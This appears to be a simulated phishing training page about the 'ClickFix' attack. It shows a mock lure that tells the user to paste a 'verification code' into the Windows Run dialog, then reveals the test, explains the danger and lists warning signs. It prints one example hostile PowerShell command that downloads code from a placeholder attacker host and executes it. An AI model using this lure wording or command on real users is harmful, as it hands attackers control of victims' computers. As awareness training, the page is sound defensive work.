Account Security
Ray ID: 8f3c1a90e2
Security check
Complete the verification step

Your session could not be validated automatically. Complete the manual step below to confirm you are a real person and restore access.

  1. 1
    Press Windows + R to open the Run dialog.
  2. 2
    Press Ctrl + V to paste the verification code.
  3. 3
    Press Enter to finish.
verification-token-8f3c1a90  # paste to confirm you are human

Protected by automated account security. Do not close this window.

✓ This was a simulated phishing test

You just walked into a “ClickFix” attack.

Nothing was installed and nothing ran. This page is part of an authorized security-awareness exercise. But if this had been a real attacker, following those three steps is all it would have taken to hand them control of your computer.

What would have happened for real

That “verification code” is not a code. On a real ClickFix page the clipboard is quietly loaded with a command, so when you paste it into Run and press Enter, you execute the attacker's code on your own machine, from your own account, past most defenses that assume malware arrives as a file. On a real one it looks like this:

powershell -w hidden -c "irwr hxxps://<attacker>/x | iex"

How to spot it every time

  • !
    A website tells you to press Win+R or open PowerShell. Legitimate sites and CAPTCHAs never ask you to run anything on your computer. This alone is the tell.
  • !
    “Paste this to verify / to fix / to unsubscribe.” Real verification happens in the browser. You should never paste anything from a page into a system prompt.
  • !
    Urgency and a manual workaround. “Automatic check failed, do this yourself to continue” is the pressure that makes people skip the instinct to stop.
  • !
    You did not start this. Unexpected confirmation emails, calls, or prompts about your account are a signal to slow down, not speed up.

If you see this, do this

1. Do not paste or run anything. Close the page.

2. Report it. Forward the message or use the Report Phish button, and contact the security team.

3. If you already ran a command, that is okay, tell security right away so they can help. Reporting fast is the win, not avoiding the mistake.

This was an authorized internal exercise.
No data was collected beyond that this training page was reached. Questions go to your security team.